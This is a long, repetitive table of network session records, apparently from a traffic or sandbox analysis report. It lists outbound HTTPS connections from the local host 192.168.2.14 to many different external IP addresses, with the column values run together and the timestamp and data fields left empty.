                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9909192.168.2.144027888.232.40.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9910192.168.2.1451306104.212.233.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9911192.168.2.1444488145.59.131.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9912192.168.2.1437162136.157.151.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9913192.168.2.1436586199.46.122.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9914192.168.2.1453442204.71.78.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9915192.168.2.1457982123.173.251.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9916192.168.2.1448136161.146.110.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9917192.168.2.1453244200.115.1.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9918192.168.2.1437772206.28.134.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9919192.168.2.1460092212.54.207.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9920192.168.2.1439840134.130.45.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9921192.168.2.1432994204.34.116.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9922192.168.2.1435068145.161.118.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9923192.168.2.145932483.81.105.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9924192.168.2.1454690116.201.63.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9925192.168.2.1444508170.22.82.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9926192.168.2.145382468.33.206.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9927192.168.2.144962292.246.194.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9928192.168.2.1452870173.233.36.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9929192.168.2.144777895.30.125.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9930192.168.2.1446538106.73.111.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9931192.168.2.145614073.13.224.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9932192.168.2.1451468195.199.231.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9933192.168.2.145364838.232.39.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9934192.168.2.143758458.83.229.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9935192.168.2.1459808185.154.201.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9936192.168.2.1457986138.36.100.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9937192.168.2.1440652151.34.110.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9938192.168.2.1457860150.173.110.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9939192.168.2.144764251.153.20.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9940192.168.2.144723848.218.234.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9941192.168.2.144205874.183.62.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9942192.168.2.1456916159.244.30.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9943192.168.2.145703243.147.33.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9944192.168.2.145730648.83.141.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9945192.168.2.144733661.144.74.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9946192.168.2.1438374185.251.105.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9947192.168.2.14524204.223.208.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9948192.168.2.1460076119.83.48.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9949192.168.2.143325227.160.55.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9950192.168.2.1447690125.133.19.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9951192.168.2.1433616188.143.185.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9952192.168.2.1446228218.252.112.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9953192.168.2.144504884.113.190.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9954192.168.2.1435802179.27.156.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9955192.168.2.1460996132.28.45.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9956192.168.2.1438792159.217.123.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9957192.168.2.1440740103.78.71.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9958192.168.2.1456200168.147.117.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9959192.168.2.1433302211.119.250.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9960192.168.2.145349680.245.68.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9961192.168.2.1455330130.138.1.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9962192.168.2.1448828184.218.234.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9963192.168.2.1445826202.173.13.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9964192.168.2.1437066126.102.147.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9965192.168.2.1451308177.81.172.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9966192.168.2.1458650123.29.127.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9967192.168.2.1450288200.89.53.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9968192.168.2.145461844.42.212.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9969192.168.2.144449289.29.92.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9970192.168.2.1453148115.113.101.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9971192.168.2.143441260.201.122.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9972192.168.2.144801845.104.28.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9973192.168.2.143710262.198.186.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9974192.168.2.1447490199.40.57.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9975192.168.2.1448884221.209.53.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9976192.168.2.1449886164.36.234.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9977192.168.2.1444994210.207.212.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9978192.168.2.1457228126.16.124.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9979192.168.2.1439206128.60.39.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9980192.168.2.145782470.254.116.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9981192.168.2.145353854.243.191.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9982192.168.2.1432840126.60.240.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9983192.168.2.14468949.159.183.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9984192.168.2.1457196133.205.241.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9985192.168.2.14548369.17.139.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9986192.168.2.144413440.101.38.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9987192.168.2.1460950106.234.178.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9988192.168.2.1454498135.249.164.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9989192.168.2.145554084.187.218.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9990192.168.2.1434562221.177.94.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9991192.168.2.1440444112.184.126.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9992192.168.2.1443736162.142.53.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9993192.168.2.1457964205.213.185.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9994192.168.2.144148017.42.183.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9995192.168.2.1434064190.55.144.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9996192.168.2.145763852.79.26.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9997192.168.2.143290091.33.85.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9998192.168.2.1453470202.54.91.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9999192.168.2.145133235.51.231.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10000192.168.2.1440974120.109.172.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10001192.168.2.145712280.135.27.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10002192.168.2.14408865.114.192.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10003192.168.2.145388231.49.16.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10004192.168.2.1451476145.147.225.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10005192.168.2.143794262.52.97.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10006192.168.2.1443098207.33.225.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10007192.168.2.1460190135.22.102.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10008192.168.2.143463854.75.206.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10009192.168.2.1439340188.130.192.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10010192.168.2.1435010142.134.9.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10011192.168.2.1452964149.167.1.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10012192.168.2.1438028218.225.87.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10013192.168.2.1447318125.171.51.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10014192.168.2.1455258180.152.5.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10015192.168.2.145549681.63.217.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10016192.168.2.1444080132.190.235.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10017192.168.2.1455362218.190.243.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10018192.168.2.144767653.223.32.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10019192.168.2.1448060100.176.213.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10020192.168.2.144878634.247.218.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10021192.168.2.144253087.107.240.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10022192.168.2.1454026177.165.110.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10023192.168.2.143860894.121.91.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10024192.168.2.1441950149.52.128.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10025192.168.2.144281840.249.17.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10026192.168.2.146034873.111.24.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10027192.168.2.144271837.219.254.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10028192.168.2.144922452.120.158.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10029192.168.2.1441344151.104.37.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10030192.168.2.143985058.205.17.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10031192.168.2.1445894117.17.165.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10032192.168.2.145748647.207.227.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10033192.168.2.144699272.102.53.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10034192.168.2.145753679.72.22.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10035192.168.2.1451704172.51.38.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10036192.168.2.1441326218.225.244.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10037192.168.2.145220651.146.77.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10038192.168.2.1441906200.121.144.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10039192.168.2.144441240.24.131.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10040192.168.2.1458446164.8.213.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10041192.168.2.143831862.53.130.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10042192.168.2.1446738216.254.112.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10043192.168.2.144851666.141.10.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10044192.168.2.144886841.210.82.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10045192.168.2.1442716119.251.211.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10046192.168.2.1439410186.74.193.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10047192.168.2.144577692.60.216.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10048192.168.2.144406812.174.241.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10049192.168.2.1453476104.198.241.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10050192.168.2.1456130132.230.185.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10051192.168.2.1452040157.208.112.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10052192.168.2.143689691.202.196.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10053192.168.2.1458356106.119.174.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10054192.168.2.143935461.25.92.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10055192.168.2.1442044109.32.63.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10056192.168.2.145560649.128.188.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10057192.168.2.143445473.61.251.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10058192.168.2.1449874114.232.241.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10059192.168.2.143374286.170.114.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10060192.168.2.1452240121.248.9.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10061192.168.2.145085872.182.18.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10062192.168.2.14528945.189.22.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10063192.168.2.1450022205.246.110.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10064192.168.2.1440744125.217.61.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10065192.168.2.1453766177.219.191.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10066192.168.2.1448964151.126.240.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10067192.168.2.143358870.45.176.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10068192.168.2.143546835.184.169.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10069192.168.2.1444404210.247.48.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10070192.168.2.1459982174.100.106.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10071192.168.2.1443750143.242.75.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10072192.168.2.144167614.76.153.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10073192.168.2.1455210115.115.5.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10074192.168.2.1442706160.94.12.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10075192.168.2.1449012180.31.43.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10076192.168.2.143553683.216.38.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10077192.168.2.1454238218.124.139.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10078192.168.2.1449292125.77.117.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10079192.168.2.1435112137.216.15.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10080192.168.2.1456882107.152.223.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10081192.168.2.1438262126.184.211.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10082192.168.2.1439750153.237.242.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10083192.168.2.1454274205.158.168.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10084192.168.2.1455938110.27.238.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10085192.168.2.145391281.124.75.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10086192.168.2.1448906221.143.194.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10087192.168.2.1449560223.106.205.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10088192.168.2.1460476190.36.237.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10089192.168.2.1436264114.68.21.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10090192.168.2.1444930201.38.166.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10091192.168.2.146004227.142.146.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10092192.168.2.1450302168.87.252.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10093192.168.2.1436490221.244.200.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10094192.168.2.144139292.165.82.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10095192.168.2.144724079.150.175.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10096192.168.2.1450304205.181.103.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10097192.168.2.1436048148.255.185.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10098192.168.2.1438380161.61.120.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10099192.168.2.144160825.206.210.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10100192.168.2.1453096211.189.175.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10101192.168.2.1435328132.183.126.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10102192.168.2.1458412189.94.102.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10103192.168.2.144373664.83.82.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10104192.168.2.1441680148.108.250.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10105192.168.2.145836619.150.87.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10106192.168.2.1445584185.227.88.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10107192.168.2.1435292118.81.11.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10108192.168.2.1447862102.196.29.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10109192.168.2.1441802212.65.245.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10110192.168.2.144330287.211.177.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10111192.168.2.1456524138.16.237.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10112192.168.2.1447986136.154.78.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10113192.168.2.145189057.100.109.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10114192.168.2.143505462.48.8.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10115192.168.2.1449556216.184.141.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10116192.168.2.145740441.60.150.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10117192.168.2.144179272.127.220.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10118192.168.2.145589076.136.46.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10119192.168.2.143995868.149.180.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10120192.168.2.1443152223.163.33.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
